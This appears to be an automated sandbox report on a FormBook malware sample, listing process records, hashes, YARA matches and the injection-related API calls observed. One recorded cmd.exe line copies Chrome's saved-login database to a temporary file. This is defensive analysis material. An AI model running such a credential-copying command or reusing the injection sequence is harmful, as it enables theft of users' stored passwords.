                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000012.00000002.368138298.0000000003896000.00000004.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000012.00000002.368138298.0000000003896000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000012.00000002.368138298.0000000003896000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000012.00000002.368427184.0000000003913000.00000004.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000012.00000002.368427184.0000000003913000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000012.00000002.368427184.0000000003913000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000012.00000002.367211386.0000000003749000.00000004.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000012.00000002.367211386.0000000003749000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000012.00000002.367211386.0000000003749000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    Reputation:low

                                                    General

                                                    Start time:15:58:50
                                                    Start date:27/11/2020
                                                    Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe'
                                                    Imagebase:0x690000
                                                    File size:402944 bytes
                                                    MD5 hash:0E7D12AD28411F68D62D3D3F17382B98
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:.Net C# or VB.NET
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000013.00000002.383962255.0000000003B52000.00000004.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000013.00000002.383962255.0000000003B52000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000013.00000002.383962255.0000000003B52000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000013.00000002.383860155.0000000003AD6000.00000004.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000013.00000002.383860155.0000000003AD6000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000013.00000002.383860155.0000000003AD6000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000013.00000002.382240548.0000000003989000.00000004.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000013.00000002.382240548.0000000003989000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000013.00000002.382240548.0000000003989000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    Reputation:low

                                                    General

                                                    Start time:15:58:55
                                                    Start date:27/11/2020
                                                    Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe
                                                    Imagebase:0x660000
                                                    File size:402944 bytes
                                                    MD5 hash:0E7D12AD28411F68D62D3D3F17382B98
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000015.00000002.437203324.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000015.00000002.437203324.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000015.00000002.437203324.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000015.00000002.438245140.0000000000C70000.00000040.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000015.00000002.438245140.0000000000C70000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000015.00000002.438245140.0000000000C70000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000015.00000002.438147328.0000000000C40000.00000040.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000015.00000002.438147328.0000000000C40000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000015.00000002.438147328.0000000000C40000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    Reputation:low

                                                    General

                                                    Start time:15:58:58
                                                    Start date:27/11/2020
                                                    Path:C:\Windows\explorer.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:
                                                    Imagebase:0x7ff693d90000
                                                    File size:3933184 bytes
                                                    MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    General

                                                    Start time:15:59:01
                                                    Start date:27/11/2020
                                                    Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe
                                                    Imagebase:0x620000
                                                    File size:402944 bytes
                                                    MD5 hash:0E7D12AD28411F68D62D3D3F17382B98
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000017.00000002.387510478.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000017.00000002.387510478.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000017.00000002.387510478.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000017.00000002.389389710.0000000001050000.00000040.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000017.00000002.389389710.0000000001050000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000017.00000002.389389710.0000000001050000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000017.00000002.388561440.0000000000B40000.00000040.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000017.00000002.388561440.0000000000B40000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000017.00000002.388561440.0000000000B40000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    Reputation:low

                                                    General

                                                    Start time:15:59:04
                                                    Start date:27/11/2020
                                                    Path:C:\Windows\SysWOW64\help.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\SysWOW64\help.exe
                                                    Imagebase:0xb20000
                                                    File size:10240 bytes
                                                    MD5 hash:09A715036F14D3632AD03B52D1DA6BFF
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000018.00000002.501338482.0000000000500000.00000040.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000018.00000002.501338482.0000000000500000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000018.00000002.501338482.0000000000500000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000018.00000002.504034660.00000000009B0000.00000004.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000018.00000002.504034660.00000000009B0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000018.00000002.504034660.00000000009B0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000018.00000002.503765338.0000000000980000.00000040.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000018.00000002.503765338.0000000000980000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000018.00000002.503765338.0000000000980000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    Reputation:moderate

                                                    General

                                                    Start time:15:59:11
                                                    Start date:27/11/2020
                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:/c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V
                                                    Imagebase:0x150000
                                                    File size:232960 bytes
                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language

                                                    General

                                                    Start time:15:59:12
                                                    Start date:27/11/2020
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff7ecfc0000
                                                    File size:625664 bytes
                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language

                                                    General

                                                    Start time:15:59:22
                                                    Start date:27/11/2020
                                                    Path:C:\Windows\SysWOW64\autoconv.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\SysWOW64\autoconv.exe
                                                    Imagebase:0x1200000
                                                    File size:851968 bytes
                                                    MD5 hash:4506BE56787EDCD771A351C10B5AE3B7
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language

                                                    General

                                                    Start time:15:59:28
                                                    Start date:27/11/2020
                                                    Path:C:\Windows\SysWOW64\ipconfig.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\SysWOW64\ipconfig.exe
                                                    Imagebase:0x9d0000
                                                    File size:29184 bytes
                                                    MD5 hash:B0C7423D02A007461C850CD0DFE09318
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001F.00000002.439648635.00000000004C0000.00000040.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001F.00000002.439648635.00000000004C0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001F.00000002.439648635.00000000004C0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group

                                                    Disassembly

                                                    Code Analysis

                                                    Reset < >

                                                      Executed Functions

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.244628595.0000000001940000.00000040.00000001.sdmp, Offset: 01940000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID: fish

                                                      APIs
                                                      • CreateActCtxA.KERNEL32(?), ref: 01945421
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.244628595.0000000001940000.00000040.00000001.sdmp, Offset: 01940000, based on PE: false
                                                      Similarity
                                                      • API ID: Create

                                                      Non-executed Functions

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.244628595.0000000001940000.00000040.00000001.sdmp, Offset: 01940000, based on PE: false

                                                      Executed Functions

                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.339535372.0000000005330000.00000040.00000001.sdmp, Offset: 05330000, based on PE: false

                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.337685614.000000000365D000.00000040.00000001.sdmp, Offset: 0365D000, based on PE: false

                                                      Non-executed Functions

                                                      Executed Functions

                                                      APIs
                                                      • NtQueryInformationProcess.NTDLL(?,?,00000000,?,?), ref: 04C43975
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.370857424.0000000004C40000.00000040.00000001.sdmp, Offset: 04C40000, based on PE: false
                                                      Similarity
                                                      • API ID: InformationProcessQuery

                                                      APIs
                                                      • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 04C4AC66
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.370857424.0000000004C40000.00000040.00000001.sdmp, Offset: 04C40000, based on PE: false
                                                      Similarity
                                                      • API ID: CreateProcess

                                                      APIs
                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 04C4EC2E
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.370857424.0000000004C40000.00000040.00000001.sdmp, Offset: 04C40000, based on PE: false
                                                      Similarity
                                                      • API ID: HandleModule

                                                      APIs
                                                      • CreateActCtxA.KERNEL32(?), ref: 008C5421
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.363642041.00000000008C0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: false
                                                      Similarity
                                                      • API ID: Create
                                                      • String ID:
                                                      • API String ID: 2289755597-0
                                                      • Opcode ID: 6b476b403cfb0fd6cadb680aaa7180bd5cb63ea39d84c38650ceb30029cb6e7b
                                                      • Instruction ID: 1a0300f9125d32658ab240d28daba3d2be48c89c6d0359af9ef6b21486d2d99b
                                                      • Opcode Fuzzy Hash: 6b476b403cfb0fd6cadb680aaa7180bd5cb63ea39d84c38650ceb30029cb6e7b
                                                      • Instruction Fuzzy Hash: DE41E0B0C04618CBDF24CFA9C884B8EBBB5FF49308F258059D409AB251DBB56989CF94
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 04C4BC30
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.370857424.0000000004C40000.00000040.00000001.sdmp, Offset: 04C40000, based on PE: false
                                                      Similarity
                                                      • API ID: MemoryProcessWrite
                                                      • String ID:
                                                      • API String ID: 3559483778-0
                                                      • Opcode ID: 62c68fb774623dae139331ee470207213ca638f100a87a96e01e0921c0c13f52
                                                      • Instruction ID: c5dcdaf0aefb43ad448882acef736dc87e9c5c3ebacde9aaff2bb059cd70499a
                                                      • Opcode Fuzzy Hash: 62c68fb774623dae139331ee470207213ca638f100a87a96e01e0921c0c13f52
                                                      • Instruction Fuzzy Hash: 792137B1D003599FCB10CFA9C9847EEBBB1FF88314F148429E958A7240D778A955CFA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 04C4BC30
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.370857424.0000000004C40000.00000040.00000001.sdmp, Offset: 04C40000, based on PE: false
                                                      Similarity
                                                      • API ID: MemoryProcessWrite
                                                      • String ID:
                                                      • API String ID: 3559483778-0
                                                      • Opcode ID: 012c19106de178415a0505550b7e7acdfafb60c2a77c2fcff100218c9e202351
                                                      • Instruction ID: f43e5994ec97f4d8d934e90565d4af24e3bc7c90f2e8502987ab9a6bc3a2c179
                                                      • Opcode Fuzzy Hash: 012c19106de178415a0505550b7e7acdfafb60c2a77c2fcff100218c9e202351
                                                      • Instruction Fuzzy Hash: 452115B19003599FCB10CFA9C984BEEBBF5FF48314F10842AE918A7240D778A954CBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • SetThreadContext.KERNELBASE(?,00000000), ref: 04C4B556
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.370857424.0000000004C40000.00000040.00000001.sdmp, Offset: 04C40000, based on PE: false
                                                      Similarity
                                                      • API ID: ContextThread
                                                      • String ID:
                                                      • API String ID: 1591575202-0
                                                      • Opcode ID: 0902081c6c15578a8778d0a8025fae539553102714cf1adddc31ad7c11dff694
                                                      • Instruction ID: 406204109e787ab32f96eb595514198812de38264dde8565f6949cc57d35c789
                                                      • Opcode Fuzzy Hash: 0902081c6c15578a8778d0a8025fae539553102714cf1adddc31ad7c11dff694
                                                      • Instruction Fuzzy Hash: 7D215771D042498FCB10CFAAC5847EEBBF1AF88314F15842ED419A7350DB78A945CFA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • SetThreadContext.KERNELBASE(?,00000000), ref: 04C4B556
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.370857424.0000000004C40000.00000040.00000001.sdmp, Offset: 04C40000, based on PE: false
                                                      Similarity
                                                      • API ID: ContextThread
                                                      • String ID:
                                                      • API String ID: 1591575202-0
                                                      • Opcode ID: ceeca62e6499344b4cf027a67f9731725aed4d72ea8eaf4dcec43a56a9f44577
                                                      • Instruction ID: bed8fe68afa5273e7d316a4704fa2a1b63cebc5faac298c1ddedbfed5062c50d
                                                      • Opcode Fuzzy Hash: ceeca62e6499344b4cf027a67f9731725aed4d72ea8eaf4dcec43a56a9f44577
                                                      • Instruction Fuzzy Hash: 86213871D042498FCB10CFAAC5847EEBBF5EF88324F54842AD519A7340DB78A945CFA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 04C4BB01
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.370857424.0000000004C40000.00000040.00000001.sdmp, Offset: 04C40000, based on PE: false
                                                      Similarity
                                                      • API ID: MemoryProcessRead
                                                      • String ID:
                                                      • API String ID: 1726664587-0
                                                      • Opcode ID: 96866eb20c2000b85b7671dbc9c4e65dd1f83acb75383f062c12e0f9b5d43b43
                                                      • Instruction ID: 1f1417c64163011a6851c9831cb3384259d7ddc121a13dd3b84afa19457085df
                                                      • Opcode Fuzzy Hash: 96866eb20c2000b85b7671dbc9c4e65dd1f83acb75383f062c12e0f9b5d43b43
                                                      • Instruction Fuzzy Hash: 4221E2B5C002599FDB10CF99D984BDEBBB4FB48320F14842AE958A7200D379AA45CFA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 04C4BCFE
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.370857424.0000000004C40000.00000040.00000001.sdmp, Offset: 04C40000, based on PE: false
                                                      Similarity
                                                      • API ID: AllocVirtual
                                                      • String ID:
                                                      • API String ID: 4275171209-0
                                                      • Opcode ID: 369348034435f0852a3f4c4663a4b665867ae28276aeefae668da208f3b8fe7c
                                                      • Instruction ID: fd70519e06d94a69c67e3a0e3745689ea9f5820edc44bd47893d6b456217423f
                                                      • Opcode Fuzzy Hash: 369348034435f0852a3f4c4663a4b665867ae28276aeefae668da208f3b8fe7c
                                                      • Instruction Fuzzy Hash: 1C1197728042489FCB10CFA9D884BDFBBF5EF88324F148819E529A7210C775A944CFA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • VirtualProtect.KERNELBASE(?,?,?,?), ref: 04C428BB
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.370857424.0000000004C40000.00000040.00000001.sdmp, Offset: 04C40000, based on PE: false
                                                      Similarity
                                                      • API ID: ProtectVirtual
                                                      • String ID:
                                                      • API String ID: 544645111-0
                                                      • Opcode ID: 59b1b13ec3a30e27237eed5abc18d4b7ab61daa044ffc0efe5644aa29d82f1f7
                                                      • Instruction ID: 6f5eed6811b85a8f446e8f921a6adcf6cce38907677ad067c7dd2ac7c8b92743
                                                      • Opcode Fuzzy Hash: 59b1b13ec3a30e27237eed5abc18d4b7ab61daa044ffc0efe5644aa29d82f1f7
                                                      • Instruction Fuzzy Hash: 6D2106B1D042499FDB10CF9AD584BDEBBF4FB48320F14842AE858A7350C374A945CFA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,04C4ECA9,00000800,00000000,00000000), ref: 04C4EE9A
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.370857424.0000000004C40000.00000040.00000001.sdmp, Offset: 04C40000, based on PE: false
                                                      Similarity
                                                      • API ID: LibraryLoad
                                                      • String ID:
                                                      • API String ID: 1029625771-0
                                                      • Opcode ID: 3370f701de70ee297d220c339dd9239f7ef935de1d6afb9fdc19a308483379e7
                                                      • Instruction ID: c7543831fd9f7a2b06c98216aa054e3c5d74cc47a6f4fbda8099c73957984d40
                                                      • Opcode Fuzzy Hash: 3370f701de70ee297d220c339dd9239f7ef935de1d6afb9fdc19a308483379e7
                                                      • Instruction Fuzzy Hash: 9C1103B2D042088FDB10CF9AD544ADEBBF5FB88320F15842AE915A7200C375AA45CFA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • VirtualProtect.KERNELBASE(?,?,?,?), ref: 04C428BB
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.370857424.0000000004C40000.00000040.00000001.sdmp, Offset: 04C40000, based on PE: false
                                                      Similarity
                                                      • API ID: ProtectVirtual
                                                      • String ID:
                                                      • API String ID: 544645111-0
                                                      • Opcode ID: 94d1f066cb71f7b4e51f92e373e8f830a8e3156742cb20f5e198910878c1fccd
                                                      • Instruction ID: 5a7239df77e1e0e87451e172d789ce82e73e4e79b61fb4c9b1336c1595a515d9
                                                      • Opcode Fuzzy Hash: 94d1f066cb71f7b4e51f92e373e8f830a8e3156742cb20f5e198910878c1fccd
                                                      • Instruction Fuzzy Hash: FF21D3B1D002499FDB10CF9AD584BDEBBF4FB48320F14842AE958A7250D378A685CFA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 04C4BB01
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.370857424.0000000004C40000.00000040.00000001.sdmp, Offset: 04C40000, based on PE: false
                                                      Similarity
                                                      • API ID: MemoryProcessRead
                                                      • String ID:
                                                      • API String ID: 1726664587-0
                                                      • Opcode ID: 156bd82064c201ee2e51730a67024dd36ec0c77375f997dba28fc58b14a74b22
                                                      • Instruction ID: 2a7e56b914133ea9e2c3af61f83e48371d86d4e5c17674e015d91075ec6a5cb8
                                                      • Opcode Fuzzy Hash: 156bd82064c201ee2e51730a67024dd36ec0c77375f997dba28fc58b14a74b22
                                                      • Instruction Fuzzy Hash: B221C5B5D002599FDB10CF99D984BDEBBF8FB48310F10841AE958A3200D374A944CFA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 04C4BCFE
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.370857424.0000000004C40000.00000040.00000001.sdmp, Offset: 04C40000, based on PE: false
                                                      Similarity
                                                      • API ID: AllocVirtual
                                                      • String ID:
                                                      • API String ID: 4275171209-0
                                                      • Opcode ID: 2c213ca42cbcb264cc4bb25e95d50b9140a0c41644825bb8949c7f3d8600482f
                                                      • Instruction ID: b9ca49cde3fb00a823e00d957b44dbff4b6df1770def3b7e621de799a38e3fba
                                                      • Opcode Fuzzy Hash: 2c213ca42cbcb264cc4bb25e95d50b9140a0c41644825bb8949c7f3d8600482f
                                                      • Instruction Fuzzy Hash: 6F1176718042489FCF10CFAAC944BEFBBF5EF88324F14881AE519A7250C775A944CFA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,04C4ECA9,00000800,00000000,00000000), ref: 04C4EE9A
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.370857424.0000000004C40000.00000040.00000001.sdmp, Offset: 04C40000, based on PE: false
                                                      Similarity
                                                      • API ID: LibraryLoad
                                                      • String ID:
                                                      • API String ID: 1029625771-0
                                                      • Opcode ID: a272cd4bf17c7e72617e57e4c562ea5503982bc29cc5cd0c75681e5b4806d8e4
                                                      • Instruction ID: d17b3257344fa973a2e7e4e4b6380a233bf0c3bfb898b9587f56acd92d71f082
                                                      • Opcode Fuzzy Hash: a272cd4bf17c7e72617e57e4c562ea5503982bc29cc5cd0c75681e5b4806d8e4
                                                      • Instruction Fuzzy Hash: 8F1144B6D002088FCB00CF99D5446DEBBF5FB88320F11842ED919A7200C378A645CFA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.370857424.0000000004C40000.00000040.00000001.sdmp, Offset: 04C40000, based on PE: false
                                                      Similarity
                                                      • API ID: ResumeThread
                                                      • String ID:
                                                      • API String ID: 947044025-0
                                                      • Opcode ID: 03656db63d8fbdebed2dcc61d4c5f7f3b22503b9ca664c9268088614cdcad6a4
                                                      • Instruction ID: d8cc33e6761eeaed7592535e888218798d1b304a1cb1b02f525f04fc0e9b7fdc
                                                      • Opcode Fuzzy Hash: 03656db63d8fbdebed2dcc61d4c5f7f3b22503b9ca664c9268088614cdcad6a4
                                                      • Instruction Fuzzy Hash: 081155B1D042498FDB10DFAAC9447EEBBF5AF88324F24842AD519B7240D778A945CFA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.370857424.0000000004C40000.00000040.00000001.sdmp, Offset: 04C40000, based on PE: false
                                                      Similarity
                                                      • API ID: ResumeThread
                                                      • String ID:
                                                      • API String ID: 947044025-0
                                                      • Opcode ID: de519e6e7b2afcc05b46510055aed8c70105956880b94981012780a113014257
                                                      • Instruction ID: bf14582b88291d3d8c26d98a9ac7becbb18d7e1dec96285bd2aeb8ea04e5438a
                                                      • Opcode Fuzzy Hash: de519e6e7b2afcc05b46510055aed8c70105956880b94981012780a113014257
                                                      • Instruction Fuzzy Hash: AF1155B1D042488BDB10CFAAC9447EEBBF5AF88224F14841AD519A7240D774A944CFA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 04C4EC2E
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.370857424.0000000004C40000.00000040.00000001.sdmp, Offset: 04C40000, based on PE: false
                                                      Similarity
                                                      • API ID: HandleModule
                                                      • String ID:
                                                      • API String ID: 4139908857-0
                                                      • Opcode ID: c2ead2e0d4702c6c625275062a2224c5bf86657da1a62dda778a5197a07fb66d
                                                      • Instruction ID: 9564447ed3503614ca3042f43179a0bab90100e8e9776f81504d1139aa5d5b70
                                                      • Opcode Fuzzy Hash: c2ead2e0d4702c6c625275062a2224c5bf86657da1a62dda778a5197a07fb66d
                                                      • Instruction Fuzzy Hash: 1D11DFB6C006498FDB10CF9AD544ADEFBF5BB88324F15841AD859A7600C375A545CFA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.370898418.0000000004C50000.00000040.00000001.sdmp, Offset: 04C50000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d999e4a8dcf1119583b1d149cd2ec54f7d7d155f8b480c06889b5a6ca78db6dd
                                                      • Instruction ID: 9445bc6c4086bbb5fac32700655fb9345bd42a22795a238d87c676d2352c9856
